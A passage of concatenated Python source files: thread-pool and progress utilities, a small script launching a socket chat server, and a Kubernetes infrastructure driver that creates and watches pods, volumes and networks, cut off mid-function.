logging.warning('Caught exception: %s', e)
exc_info = sys.exc_info()
logging.info(''.join(traceback.format_tb(exc_info[2])))
with self._outputs_exceptions_cond:
self._exceptions.append(exc_info)
self._outputs_exceptions_cond.notifyAll()
finally:
try:
# Mark thread as ready again, mark task as processed. Do it before
# waking up threads waiting on self.tasks.join(). Otherwise they might
# find ThreadPool still 'busy' and perform unnecessary wait on CV.
with self._outputs_exceptions_cond:
self._ready += 1
self._pending_count -= 1
if self._pending_count == 0:
self._outputs_exceptions_cond.notifyAll()
self.tasks.task_done()
except Exception as e:
# We need to catch and log this error here because this is the root
# function for the thread, nothing higher will catch the error.
logging.exception('Caught exception while marking task as done: %s',
e)
def _output_append(self, out):
if out is not None:
with self._outputs_exceptions_cond:
self._outputs.append(out)
self._outputs_exceptions_cond.notifyAll()
def join(self):
"""Extracts all the results from each threads unordered.
Call repeatedly to extract all the exceptions if desired.
Note: will wait for all work items to be done before returning an exception.
To get an exception early, use get_one_result().
"""
# TODO(maruel): Stop waiting as soon as an exception is caught.
self.tasks.join()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
raise e[1]
out = self._outputs
self._outputs = []
return out
def get_one_result(self):
"""Returns the next item that was generated or raises an exception if one
occurred.
Raises:
ThreadPoolEmpty - no results available.
"""
# Get first available result.
for result in self.iter_results():
return result
# No results -> tasks queue is empty.
raise ThreadPoolEmpty('Task queue is empty')
def iter_results(self):
"""Yields results as they appear until all tasks are processed."""
while True:
# Check for pending results.
result = None
self._on_iter_results_step()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
raise e[1]
if self._outputs:
# Remember the result to yield it outside of the lock.
result = self._outputs.pop(0)
else:
# No pending tasks -> all tasks are done.
if not self._pending_count:
return
# Some task is queued, wait for its result to appear.
# Use non-None timeout so that process reacts to Ctrl+C and other
# signals, see http://bugs.python.org/issue8844.
self._outputs_exceptions_cond.wait(timeout=0.1)
continue
yield result
def close(self):
"""Closes all the threads."""
# Ensure no new threads can be started, self._workers is effectively
# a constant after that and can be accessed outside the lock.
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not close already closed ThreadPool')
self._is_closed = True
for _ in range(len(self._workers)):
self.tasks.put(self.TASK_END_SENTINEL)
for t in self._workers:
# 'join' without timeout blocks signal handlers, spin with timeout.
while t.is_alive():
t.join(30)
logging.debug(
'Thread pool \'%s\' closed: spawned %d threads total',
self._prefix, len(self._workers))
def abort(self):
"""Empties the queue.
To be used when the pool should stop early, like when Ctrl-C was detected.
Returns:
Number of tasks cancelled.
"""
index = 0
while True:
try:
self.tasks.get_nowait()
self.tasks.task_done()
index += 1
except queue.Empty:
return index
def _on_iter_results_step(self):
pass
def __enter__(self):
"""Enables 'with' statement."""
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Enables 'with' statement."""
self.close()
class AutoRetryThreadPool(ThreadPool):
"""Automatically retries enqueued operations on exception."""
# See also PRIORITY_* module-level constants.
INTERNAL_PRIORITY_BITS = (1<<8) - 1
def __init__(self, exceptions, retries, *args, **kwargs):
"""
Arguments:
exceptions: list of exception classes that can be retried on.
retries: maximum number of retries to do.
"""
assert exceptions and all(issubclass(e, Exception) for e in exceptions), (
exceptions)
assert 1 <= retries <= self.INTERNAL_PRIORITY_BITS
super(AutoRetryThreadPool, self).__init__(*args, **kwargs)
self._swallowed_exceptions = tuple(exceptions)
self._retries = retries
def add_task(self, priority, func, *args, **kwargs):
"""Tasks added must not use the lower priority bits since they are reserved
for retries.
"""
assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
return super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
None,
func,
*args,
**kwargs)
def add_task_with_channel(self, channel, priority, func, *args, **kwargs):
"""Tasks added must not use the lower priority bits since they are reserved
for retries.
"""
assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
return super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
channel,
func,
*args,
**kwargs)
def _task_executer(self, priority, channel, func, *args, **kwargs):
"""Wraps the function and automatically retry on exceptions."""
try:
result = func(*args, **kwargs)
if channel is None:
return result
channel.send_result(result)
# pylint: disable=catching-non-exception
except self._swallowed_exceptions as e:
# Retry a few times, lowering the priority.
actual_retries = priority & self.INTERNAL_PRIORITY_BITS
if actual_retries < self._retries:
priority += 1
logging.debug(
'Swallowed exception \'%s\'. Retrying at lower priority %X',
e, priority)
super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
channel,
func,
*args,
**kwargs)
return
if channel is None:
raise
channel.send_exception()
except Exception:
if channel is None:
raise
channel.send_exception()
class IOAutoRetryThreadPool(AutoRetryThreadPool):
"""Thread pool that automatically retries on IOError.
Supposed to be used for IO bound tasks, and thus default maximum number of
worker threads is independent of number of CPU cores.
"""
# Initial and maximum number of worker threads.
INITIAL_WORKERS = 2
MAX_WORKERS = 16 if sys.maxsize > 2**32 else 8
RETRIES = 5
def __init__(self):
super(IOAutoRetryThreadPool, self).__init__(
[IOError],
self.RETRIES,
self.INITIAL_WORKERS,
self.MAX_WORKERS,
0,
'io')
class Progress:
"""Prints progress and accepts updates thread-safely."""
def __init__(self, columns):
"""Creates a Progress bar that will updates asynchronously from the worker
threads.
Arguments:
columns: list of tuple(name, initialvalue), defines both the number of
columns and their initial values.
"""
assert all(
len(c) == 2 and isinstance(c[0], str) and isinstance(c[1], int)
for c in columns), columns
# Members to be used exclusively in the primary thread.
self.use_cr_only = True
self.unfinished_commands = set()
self.start = time.time()
self._last_printed_line = ''
self._columns = [c[1] for c in columns]
self._columns_lookup = dict((c[0], i) for i, c in enumerate(columns))
# Setting it to True forces a print on the first print_update() call.
self._value_changed = True
# To be used in all threads.
self._queued_updates = queue.Queue()
def update_item(self, name, raw=False, **kwargs):
"""Queue information to print out.
Arguments:
name: string to print out to describe something that was completed.
raw: if True, prints the data without the header.
raw: if True, prints the data without the header.
<kwargs>: argument name is a name of a column. it's value is the increment
to the column, value is usually 0 or 1.
"""
assert isinstance(name, basestring), repr(name)
assert isinstance(raw, bool), repr(raw)
assert all(isinstance(v, int) for v in kwargs.values()), repr(kwargs)
args = [(self._columns_lookup[k], v) for k, v in kwargs.items() if v]
self._queued_updates.put((name, raw, args))
def print_update(self):
"""Prints the current status."""
# Flush all the logging output so it doesn't appear within this output.
for handler in logging.root.handlers:
handler.flush()
got_one = False
while True:
try:
name, raw, args = self._queued_updates.get_nowait()
except queue.Empty:
break
for k, v in args:
self._columns[k] += v
self._value_changed = bool(args)
if not name:
# Even if raw=True, there's nothing to print.
continue
got_one = True
if raw:
# Prints the data as-is.
self._last_printed_line = ''
sys.stdout.write('\n%s\n' % name.strip('\n'))
else:
line, self._last_printed_line = self._gen_line(name)
sys.stdout.write(line)
if not got_one and self._value_changed:
# Make sure a line is printed in that case where statistics changes.
line, self._last_printed_line = self._gen_line('')
sys.stdout.write(line)
got_one = True
self._value_changed = False
if got_one:
# Ensure that all the output is flushed to prevent it from getting mixed
# with other output streams (like the logging streams).
sys.stdout.flush()
if self.unfinished_commands:
logging.debug('Waiting for the following commands to finish:\n%s',
'\n'.join(self.unfinished_commands))
def _gen_line(self, name):
"""Generates the line to be printed."""
next_line = ('[%s] %6.2fs %s') % (
self._render_columns(), time.time() - self.start, name)
# Fill it with whitespace only if self.use_cr_only is set.
prefix = ''
if self.use_cr_only and self._last_printed_line:
prefix = '\r'
if self.use_cr_only:
suffix = ' ' * max(0, len(self._last_printed_line) - len(next_line))
else:
suffix = '\n'
return '%s%s%s' % (prefix, next_line, suffix), next_line
def _render_columns(self):
"""Renders the columns."""
columns_as_str = map(str, self._columns)
max_len = max(map(len, columns_as_str))
return '/'.join(i.rjust(max_len) for i in columns_as_str)
class QueueWithProgress(queue.PriorityQueue):
"""Implements progress support in join()."""
def __init__(self, progress, *args, **kwargs):
queue.PriorityQueue.__init__(self, *args, **kwargs)
self.progress = progress
def task_done(self):
"""Contrary to Queue.task_done(), it wakes self.all_tasks_done at each task
done.
"""
with self.all_tasks_done:
try:
unfinished = self.unfinished_tasks - 1
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.unfinished_tasks = unfinished
# This is less efficient, because we want the Progress to be updated.
self.all_tasks_done.notify_all()
except Exception as e:
logging.exception('task_done threw an exception.\n%s', e)
def wake_up(self):
"""Wakes up all_tasks_done.
Unlike task_done(), do not substract one from self.unfinished_tasks.
"""
# TODO(maruel): This is highly inefficient, since the listener is awaken
# twice; once per output, once per task. There should be no relationship
# between the number of output and the number of input task.
with self.all_tasks_done:
self.all_tasks_done.notify_all()
def join(self):
"""Calls print_update() whenever possible."""
self.progress.print_update()
with self.all_tasks_done:
while self.unfinished_tasks:
self.progress.print_update()
# Use a short wait timeout so updates are printed in a timely manner.
# TODO(maruel): Find a way so Progress.queue and self.all_tasks_done
# share the same underlying event so no polling is necessary.
self.all_tasks_done.wait(0.1)
self.progress.print_update()
class ThreadPoolWithProgress(ThreadPool):
QUEUE_CLASS = QueueWithProgress
def __init__(self, progress, *args, **kwargs):
self.QUEUE_CLASS = functools.partial(self.QUEUE_CLASS, progress)
super(ThreadPoolWithProgress, self).__init__(*args, **kwargs)
def _output_append(self, out):
"""Also wakes up the listener on new completed test_case."""
super(ThreadPoolWithProgress, self)._output_append(out)
self.tasks.wake_up()
def _on_iter_results_step(self):
self.tasks.progress.print_update()
class DeadlockDetector:
"""Context manager that can detect deadlocks.
It will dump stack frames of all running threads if its 'ping' method isn't
called in time.
Usage:
with DeadlockDetector(timeout=60) as detector:
for item in some_work():
...
detector.ping()
...
Arguments:
timeout - maximum allowed time between calls to 'ping'.
"""
def __init__(self, timeout):
self.timeout = timeout
self._thread = None
# Thread stop condition. Also lock for shared variables below.
self._stop_cv = threading.Condition()
self._stop_flag = False
# Time when 'ping' was called last time.
self._last_ping = None
# True if pings are coming on time.
self._alive = True
def __enter__(self):
"""Starts internal watcher thread."""
assert self._thread is None
self.ping()
self._thread = threading.Thread(name='deadlock-detector', target=self._run)
self._thread.daemon = True
self._thread.start()
return self
def __exit__(self, *_args):
"""Stops internal watcher thread."""
assert self._thread is not None
with self._stop_cv:
self._stop_flag = True
self._stop_cv.notify()
self._thread.join()
self._thread = None
self._stop_flag = False
def ping(self):
"""Notify detector that main thread is still running.
Should be called periodically to inform the detector that everything is
running as it should.
"""
with self._stop_cv:
self._last_ping = time.time()
self._alive = True
def _run(self):
"""Loop that watches for pings and dumps threads state if ping is late."""
with self._stop_cv:
while not self._stop_flag:
# Skipped deadline? Dump threads and switch to 'not alive' state.
if self._alive and time.time() > self._last_ping + self.timeout:
self.dump_threads(time.time() - self._last_ping, True)
self._alive = False
# Pings are on time?
if self._alive:
# Wait until the moment we need to dump stack traces.
# Most probably some other thread will call 'ping' to move deadline
# further in time. We don't bother to wake up after each 'ping',
# only right before initial expected deadline.
self._stop_cv.wait(self._last_ping + self.timeout - time.time())
else:
# Skipped some pings previously. Just periodically silently check
# for new pings with some arbitrary frequency.
self._stop_cv.wait(self.timeout * 0.1)
@staticmethod
def dump_threads(timeout=None, skip_current_thread=False):
"""Dumps stack frames of all running threads."""
all_threads = threading.enumerate()
current_thread_id = threading.current_thread().ident
# Collect tracebacks: thread name -> traceback string.
tracebacks = {}
# pylint: disable=W0212
for thread_id, frame in sys._current_frames().items():
# Don't dump deadlock detector's own thread, it's boring.
if thread_id == current_thread_id and skip_current_thread:
continue
# Try to get more informative symbolic thread name.
name = 'untitled'
for thread in all_threads:
if thread.ident == thread_id:
name = thread.name
break
name += ' #%d' % (thread_id,)
tracebacks[name] = ''.join(traceback.format_stack(frame))
# Function to print a message. Makes it easier to change output destination.
def output(msg):
logging.warning(msg.rstrip())
# Print tracebacks, sorting them by thread name. That way a thread pool's
# threads will be printed as one group.
output('=============== Potential deadlock detected ===============')
if timeout is not None:
output('No pings in last %d sec.' % (timeout,))
output('Dumping stack frames for all threads:')
for name in sorted(tracebacks):
output('Traceback for \'%s\':\n%s' % (name, tracebacks[name]))
output('===========================================================')
class TaskChannel:
"""Queue of results of async task execution."""
class Timeout(Exception):
"""Raised by 'pull' in case of timeout."""
_ITEM_RESULT = object()
_ITEM_EXCEPTION = object()
_ITEM_DONE = object()
def __init__(self):
self._queue = queue.Queue()
def send_result(self, result):
"""Enqueues a result of task execution."""
self._queue.put((self._ITEM_RESULT, result))
def send_done(self):
"""Stops the iteration."""
self._queue.put((self._ITEM_DONE, None))
def send_exception(self, exc_info=None):
"""Enqueue an exception raised by a task.
Arguments:
exc_info: If given, should be 3-tuple returned by sys.exc_info(),
default is current value of sys.exc_info(). Use default in
'except' blocks to capture currently processed exception.
"""
exc_info = exc_info or sys.exc_info()
assert isinstance(exc_info, tuple) and len(exc_info) == 3
# Transparently passing Timeout will break 'pull' contract, since a caller
# has no way to figure out that's an exception from the task and not from
# 'pull' itself. Transform Timeout into generic RuntimeError with
# explanation.
if isinstance(exc_info[1], TaskChannel.Timeout):
exc_info = (
RuntimeError,
RuntimeError('Task raised Timeout exception'),
exc_info[2])
self._queue.put((self._ITEM_EXCEPTION, exc_info))
def __iter__(self):
return self
def next(self, timeout=None):
"""Dequeues available result or exception.
Args:
timeout: if not None will block no longer than |timeout| seconds and will
raise TaskChannel.Timeout exception if no results are available.
Returns:
Whatever task pushes to the queue by calling 'send_result'.
Raises:
TaskChannel.Timeout: waiting longer than |timeout|.
Whatever exception task raises.
"""
# Do not ever use timeout == None, in that case signal handlers are not
# being called (at least on Python 2.7, http://bugs.python.org/issue8844).
while True:
try:
item_type, value = self._queue.get(
timeout=timeout if timeout is not None else 30.0)
break
except queue.Empty:
if timeout is None:
continue
raise TaskChannel.Timeout()
if item_type == self._ITEM_RESULT:
return value
if item_type == self._ITEM_EXCEPTION:
# 'value' is captured sys.exc_info() 3-tuple. Use extended raise syntax
# to preserve stack frame of original exception (that was raised in
# another thread).
assert isinstance(value, tuple) and len(value) == 3
raise value[1]
if item_type == self._ITEM_DONE:
raise StopIteration()
assert False, 'Impossible queue item type: %r' % item_type
def __next__(self):
# For python3 compatibility
return self.next()
def wrap_task(self, task):
"""Decorator that makes a function push results into this channel."""
@functools.wraps(task)
def wrapped(*args, **kwargs):
try:
self.send_result(task(*args, **kwargs))
except Exception:
self.send_exception()
return wrapped
def num_processors():
"""Returns the number of processors.
Python on OSX 10.6 raises a NotImplementedError exception.
"""
try:
# Multiprocessing
import multiprocessing
return multiprocessing.cpu_count()
except: # pylint: disable=W0702
try:
# Mac OS 10.6
return int(os.sysconf('SC_NPROCESSORS_ONLN')) # pylint: disable=E1101
except:
# Some of the windows builders seem to get here.
return 4
|
socketMethod.py
|
#-*- coding:utf-8 -*-
import time, threading
from SocketServer import TCPServer, BaseRequestHandler
import traceback
from PythonSocketBBS import SocketServerBBS
def loop(a):
print 'thread is running...'
#
time.sleep(1)
a.serve_forever()
print 'thread ended.'
def socketMethod():
print 'Method is running...'
hostname=""
port=9996
print port
a=SocketServerBBS.PythonChatServer((hostname,port),SocketServerBBS.RequestHandler)
t = threading.Thread(target=loop,args=(a,))
t.start()
while 1:
time.sleep(1)
b=SocketServerBBS.Sclose()
print b
print (1==b)
if (1==b):
print 'close'
a.shutdown()
a.server_close()
break
# t.join()
print 'Method ended.'
if __name__ == "__main__":
socketMethod()
|
environment.py
|
import uuid, yaml, json, sys, threading, logging
from threading import Thread
from kubernetes import client, config, watch
from kubernetes.client.rest import ApiException as K8sApiException
from kubernetes.client import V1DeleteOptions
from ignition.model.infrastructure import InfrastructureTask
from ignition.model.failure import FailureDetails, FAILURE_CODE_INTERNAL_ERROR, FAILURE_CODE_INFRASTRUCTURE_ERROR, FAILURE_CODE_UNKNOWN, FAILURE_CODE_INTERNAL_ERROR, FAILURE_CODE_RESOURCE_NOT_FOUND, FAILURE_CODE_RESOURCE_ALREADY_EXISTS
from ignition.service.framework import Service, Capability, interface
from ignition.service.logging import logging_context, LM_HTTP_HEADER_PREFIX, LM_HTTP_HEADER_TXNID, LM_HTTP_HEADER_PROCESS_ID
from ignition.model.infrastructure import STATUS_IN_PROGRESS, STATUS_UNKNOWN, STATUS_FAILED, STATUS_COMPLETE, InfrastructureTask, CreateInfrastructureResponse
from ignition.api.exceptions import ApiException
from k8svimdriver.k8s.cache import DeploymentLocationCache
from k8svimdriver.model.kubeconfig import KubeConfig
logger = logging.getLogger(__name__)
K8S_SERVER_PROP = 'k8s-server'
K8S_USERNAME = 'k8s-username'
K8S_CERT_AUTH_DATA_PROP = 'k8s-certificate-authority-data'
K8S_CLIENT_CERT_DATA_PROP = 'k8s-client-certificate-data'
K8S_CLIENT_KEY_DATA_PROP = 'k8s-client-key-data'
K8S_TOKEN_PROP = 'k8s-token'
K8S_NAMESPACE = "k8s-namespace"
REGISTRY_URI_PROP = 'registry_uri'
class InvalidDeploymentLocationException(ApiException):
status_code = 400
class K8sDeploymentLocation():
def __init__(self, deployment_location, k8s_properties, inf_messaging_service):
self.k8s_properties = k8s_properties
self.inf_messaging_service = inf_messaging_service
logger.debug('deployment location=' + str(deployment_location))
self.__name = deployment_location.get('name')
if self.__name is None:
raise InvalidDeploymentLocationException('Deployment Location managed by the K8s VIM Driver must have a name')
dl_properties = deployment_location.get('properties', {})
if dl_properties is None:
raise InvalidDeploymentLocationException('Deployment Location properties are missing')
k8sNamespace = dl_properties.get(K8S_NAMESPACE, None)
if k8sNamespace is None or k8sNamespace == '':
raise InvalidDeploymentLocationException('Deployment Location managed by the K8s VIM Driver must specify a property value for \'{0}\''.format(K8S_NAMESPACE))
self.__k8sNamespace = k8sNamespace
k8sServer = dl_properties.get(K8S_SERVER_PROP, None)
if k8sServer is None or k8sServer == '':
raise InvalidDeploymentLocationException('Deployment Location managed by the K8s VIM Driver must specify a property value for \'{0}\''.format(K8S_SERVER_PROP))
self.__k8sServer = k8sServer
self.kubeconfig_file = self.createKubeConfig(deployment_location)
self.k8s_client = config.new_client_from_config(config_file=self.kubeconfig_file)
self.watcher = watch.Watch()
self.init_pod_watcher()
def createKubeConfig(self, deployment_location):
dl_properties = deployment_location['properties']
return KubeConfig(self.k8s_properties.tmpdir, deployment_location['name'], dl_properties[K8S_SERVER_PROP], dl_properties.get(K8S_TOKEN_PROP, None), dl_properties.get(K8S_CERT_AUTH_DATA_PROP, None), dl_properties.get(K8S_CLIENT_CERT_DATA_PROP, None), dl_properties.get(K8S_CLIENT_KEY_DATA_PROP, None)).write()
def init_pod_watcher(self):
self.pod_watcher = threading.Thread(target=self.pod_watcher_worker, args=())
self.pod_watcher.setDaemon(True)
self.pod_watcher.start()
def pod_watcher_worker(self):
try:
logger.info('Monitoring pods')
# TODO loop until close condition is set
while True:
last_seen_version = 0
# poll forever (timeout == 0)
for pod_event in self.watcher.stream(self.coreV1Api().list_pod_for_all_namespaces, resource_version=last_seen_version, timeout_seconds=0):
event_type = pod_event['type']
pod = pod_event['object']
metadata = pod.metadata
if last_seen_version == 0:
# track where we are up to in the pod events stream in case we have to restart
last_seen_version = metadata.resource_version
pod_name = metadata.name
labels = metadata.labels
infrastructure_id = labels.get('infrastructure_id', None)
if infrastructure_id is not None:
logging_context.set_from_dict(labels)
try:
logger.debug('Got pod event {0}'.format(pod_event))
outputs = {}
phase = pod.status.phase
podStatus = self.__build_pod_status(event_type, pod, outputs)
request_type = 'CREATE'
failure_details = None
outputs = {
"host": pod.metadata.name
}
if phase is None:
status = STATUS_UNKNOWN
elif phase in ['Pending']:
container_statuses = pod.status.container_statuses
if container_statuses is not None and len(container_statuses) > 0:
waiting = container_statuses[0].state.waiting
if(waiting is not None):
if(waiting.reason in ['ErrImagePull', 'ImagePullBackOff']):
status = STATUS_FAILED
failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, 'ErrImagePull')
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
elif phase in ['Running']:
status = STATUS_COMPLETE
elif phase in ['Failed']:
status = STATUS_FAILED
failure_details = FailureDetails(FAILURE_CODE_INFRASTRUCTURE_ERROR, podStatus.status_reason)
else:
status = STATUS_UNKNOWN
if status in [STATUS_COMPLETE, STATUS_FAILED]:
if status == STATUS_COMPLETE:
try:
# try to find the ConfigMap that contains information on output property mappings
cm = self.coreV1Api().read_namespaced_config_map(infrastructure_id, self.namespace())
logger.info("Got ConfigMap {0} for infrastructure_id {1}".format(str(cm), infrastructure_id))
if cm is not None:
for output_prop_name, k8s_key in cm.data.items():
logger.info("Output: {0}={1}".format(output_prop_name, k8s_key))
if k8s_key.startswith('network.'):
k8s_prop_name = k8s_key[len('network.'):]
logger.info("k8s_prop_name: {0}".format(k8s_prop_name))
annotations = pod.metadata.annotations
networks_status_str = annotations.get('k8s.v1.cni.cncf.io/networks-status', None)
logger.info('networks_status_str: {0}'.format(str(networks_status_str)))
if networks_status_str is not None:
networks_status = json.loads(networks_status_str)
for network_status in networks_status:
net_name = network_status.get('name', None)
net_ips = network_status.get('ips', {})
logger.info('net_name {0}, net_ips {1}'.format(net_name, str(net_ips)))
if net_name is not None and len(net_ips) > 0:
if net_name == k8s_prop_name:
outputs[output_prop_name] = net_ips[0]
else:
logger.info('network status not found for output property {0}'.format(output_prop_name))
except K8sApiException as e:
# ok
if e.status == 404:
logger.info("Unable to find cm for infrastructure id {0}".format(infrastructure_id))
inf_task = InfrastructureTask(infrastructure_id, infrastructure_id, status, failure_details, outputs)
logger.info('Sending infrastructure response {0}'.format(str(inf_task)))
self.inf_messaging_service.send_infrastructure_task(inf_task)
finally:
logging_context.clear()
except Exception:
logger.exception("Unexpected exception watching pods, re-initializing")
self.pod_watcher_worker()
def storage_watcher_worker(self):
logger.debug('Monitoring storage')
for item in self.watcher.stream(self.coreV1Api().list_persistent_volume, timeout_seconds=0):
storage = item['object']
logger.debug('storage event {0}'.format(item))
def namespace(self):
return self.__k8sNamespace
def coreV1Api(self):
return client.CoreV1Api(self.k8s_client)
def customApi(self):
return client.CustomObjectsApi(self.k8s_client)
def create_infrastructure_impl(self, infrastructure_id, k8s):
try:
logger.info('storage=' + str(k8s.get('storage')))
for storage_name, storage in k8s.get('storage', {}).items():
storageSize = storage.get('size', None)
storageClassName = storage.get('storageClassName', None)
properties = {
}
if storageClassName == "hostpath":
properties['hostpath'] = storage.get('hostpath', None)
self.create_storage(storage_name, storageSize, storageClassName, infrastructure_id, properties)
for _, network in k8s.get('networks', {}).items():
network_name = network.get('name', None)
bridge = network.get('bridge', None)
subnet = network.get('subnet', None)
range_start = network.get('range_start', None)
range_end = network.get('range_end', None)
self.create_network(infrastructure_id, network_name, bridge, subnet, range_start, range_end)
# TODO mapping storageClassName to pods - just have one storage class?
for pod in k8s.get('pods', []):
pod_name = pod.get('name', None)
image = pod.get('image', None)
container_port = pod.get('container_port', None)
# storage_name, storageClassName, storageSize
storage = pod.get('storage', [])
networks = pod.get('network', [])
logger.info('pod_name=' + pod_name)
self.create_pod(pod_name, image, container_port, infrastructure_id, storage, networks)
self.create_config_map_for_outputs(pod_name, infrastructure_id, k8s.get('outputs', {}))
except K8sApiException as e:
if e.status == 409:
logger.error('K8s exception1' + str(e))
self.inf_messaging_service.send_infrastructure_task(InfrastructureTask(infrastructure_id, infrastructure_id, STATUS_FAILED, FailureDetails(FAILURE_CODE_RESOURCE_ALREADY_EXISTS, "Resource already exists"), {}))
else:
logger.error('K8s exception2' + str(e))
self.inf_messaging_service.send_infrastructure_task(InfrastructureTask(infrastructure_id, infrastructure_id, STATUS_FAILED, FailureDetails(FAILURE_CODE_INTERNAL_ERROR, str(e)), {}))
except Exception as e:
logger.error('K8s exception2' + str(e))
self.inf_messaging_service.send_infrastructure_task(InfrastructureTask(infrastructure_id, infrastructure_id, STATUS_FAILED, FailureDetails(FAILURE_CODE_INTERNAL_ERROR, str(e)), {}))
def create_infrastructure(self, infrastructure_id, k8s):
# Run in a thread so the driver can respond ASAP
# TODO use Ignition job queue to queue these requests up
worker = Thread(target=self.create_infrastructure_impl, args=(infrastructure_id, k8s,))
# force the driver to wait for any create infrastructure threads to finish before exiting
worker.setDaemon(False)
worker.start()
return CreateInfrastructureResponse(infrastructure_id, infrastructure_id)
def create_config_map_for_outputs(self, pod_name, infrastructure_id, outputs):
logger.info("output = {0}".format(str(outputs)))
logger.info("output type = {0}".format(str(type(outputs))))
api_response = self.coreV1Api().create_namespaced_config_map(namespace=self.namespace(), body=client.V1ConfigMap(api_version="v1",
kind="ConfigMap",
metadata=client.V1ObjectMeta(
namespace=self.namespace(),
name=infrastructure_id,
labels={"infrastructure_id": infrastructure_id}),
data=outputs)
)
# TODO handle api_response
logger.info("Config Map created. status='%s'" % str(api_response))
def normalize_name(self, name):
return name.replace("_", "-")
def create_pod_object(self, podName, image, container_port, infrastructure_id, storage, networks):
# Configure Pod template container
ports = []
if(container_port is not None):
ports.append(client.V1ContainerPort(name="http", container_port=container_port, protocol="TCP"))
volumes = []
volumeMounts = []
for s in storage:
volumes.append(client.V1Volume(
name=self.normalize_name(s["name"]),
persistent_volume_claim=client.V1PersistentVolumeClaimVolumeSource(
claim_name=self.normalize_name(s["name"])
)
))
volumeMounts.append(client.V1VolumeMount(
name=self.normalize_name(s["name"]),
mount_path=s["mountPath"]
# other optional arguments, see the volume mount doc link below
))
container = client.V1Container(
name=podName,
image=image,
image_pull_policy="IfNotPresent",
ports=ports,
volume_mounts=volumeMounts)
networks_as_string = ', '.join(list(map(lambda network: network['name'], networks)))
logger.info('pod networks: ' + str(networks_as_string))
spec = client.V1PodSpec(
containers=[container],
volumes=volumes)
return client.V1Pod(
api_version="v1",
kind="Pod",
metadata=client.V1ObjectMeta(name=podName, labels={
"infrastructure_id": infrastructure_id,
LM_HTTP_HEADER_TXNID: logging_context.get(LM_HTTP_HEADER_TXNID, ""),
LM_HTTP_HEADER_PROCESS_ID: logging_context.get(LM_HTTP_HEADER_PROCESS_ID, "")
},
annotations={
"k8s.v1.cni.cncf.io/networks": networks_as_string,
}),
spec=spec)
def create_network(self, infrastructure_id, name, bridge, subnet, range_start, range_end):
logger.info("Creating network {0} {1} {2} {3} {4} {5}".format(infrastructure_id, name, bridge, subnet, range_start, range_end))
# we support Multus networks only at present
config = {
"name": name,
"type": "bridge",
"bridge": bridge,
"isDefaultGateway": True,
"forceAddress": False,
"ipMasq": True,
"hairpinMode": True,
"ipam": {
"type": "host-local",
"subnet": subnet,
"rangeStart": range_start,
"rangeEnd": range_end
}
}
body = {
"apiVersion": "k8s.cni.cncf.io/v1",
"kind": "NetworkAttachmentDefinition",
"metadata": {
"name": name,
"labels": {
"infrastructure_id": infrastructure_id
}
},
"spec": {
"config": json.dumps(config)
}
}
logger.info('create network, body = {0}'.format(json.dumps(body)))
try:
self.customApi().create_namespaced_custom_object(group="k8s.cni.cncf.io", version="v1", namespace=self.namespace(), plural="network-attachment-definitions", body=body)
except K8sApiException as e:
if e.reason == 'Conflict':
# this is ok, assume the network already exists
pass
else:
raise
def create_pod(self, podName, image, container_port, infrastructure_id, storage, networks):
logger.info("pod storage="+str(storage))
for s in storage:
claimObject = client.V1PersistentVolumeClaim(
metadata=client.V1ObjectMeta(
namespace=self.namespace(),
name=self.normalize_name(s["name"]),
labels={"infrastructure_id": infrastructure_id}),
spec=client.V1PersistentVolumeClaimSpec(
access_modes=["ReadWriteOnce"],
resources=client.V1ResourceRequirements(
requests={
"storage": s["size"]
},
limits={
}
),
# TODO
storage_class_name=s["storageClassName"]
)
)
logger.info("Volume claim %s" % str(claimObject))
api_response = self.coreV1Api().create_namespaced_persistent_volume_claim(
body=claimObject,
namespace=self.namespace())
# TODO handle api_response
logger.info("Persistent volume claim created. status='%s'" % str(api_response.status))
logger.info('Creating pod object')
pod = self.create_pod_object(podName, image, container_port, infrastructure_id, storage, networks)
logger.info("Namespace = " + self.namespace())
logger.info("Creating pod %s" % str(pod))
# Create pod
api_response = self.coreV1Api().create_namespaced_pod(
body=pod,
namespace=self.namespace())
logger.info("Pod created. status='%s'" % str(api_response.status))
return api_response
def __build_pod_status(self, request_type, pod, outputs):
phase = pod.status.phase
status_reason = None
status = STATUS_UNKNOWN
# if request_type == 'CREATE':
if(phase is None):
status = STATUS_UNKNOWN
elif(phase in ['Pending']):
container_statuses = pod.status.container_statuses
if container_statuses is not None and len(container_statuses) > 0:
waiting = container_statuses[0].state.waiting
if(waiting is not None):
if(waiting.reason == 'ErrImagePull'):
status = STATUS_FAILED
status_reason = 'ErrImagePull'
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
else:
status = STATUS_IN_PROGRESS
elif(phase in ['Running']):
status = STATUS_COMPLETE
elif(phase in ['Failed']):
status = STATUS_FAILED
else:
status = STATUS_UNKNOWN
return {
'status': status,
'status_reason': status_reason
}
def __build_pvc_status(self, request_type, pvc, outputs):
phase = pvc.status.phase
status_reason = None
status = STATUS_UNKNOWN
logger.debug('__build_pvc_status {0} {1}'.format(request_type, pvc))
if(phase is None):
status = STATUS_UNKNOWN
elif(phase == 'Failed'):
status = STATUS_FAILED
elif(phase == 'Bound'):
status = STATUS_COMPLETE
elif(phase == 'Available'):
# TODO check this
status = STATUS_IN_PROGRESS
else:
status = STATUS_UNKNOWN
return {
'status': status,
'status_reason': status_reason
}
def get_infrastructure(self, infrastructure_id, request_type):
outputs = {}
statuses = []
statuses.append(list(map(lambda pod: self.__build_pod_status(request_type, pod, outputs), self.coreV1Api().list_namespaced_pod(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id)))))
statuses.append(list(map(lambda pvc: self.__build_pvc_status(request_type, pvc, outputs), self.coreV1Api().list_namespaced_persistent_volume_claim(namespace=self.namespace(), label_selector='infrastructure_id={}'.format(infrastructure_id)))))
failure_details = None
status = STATUS_COMPLETE
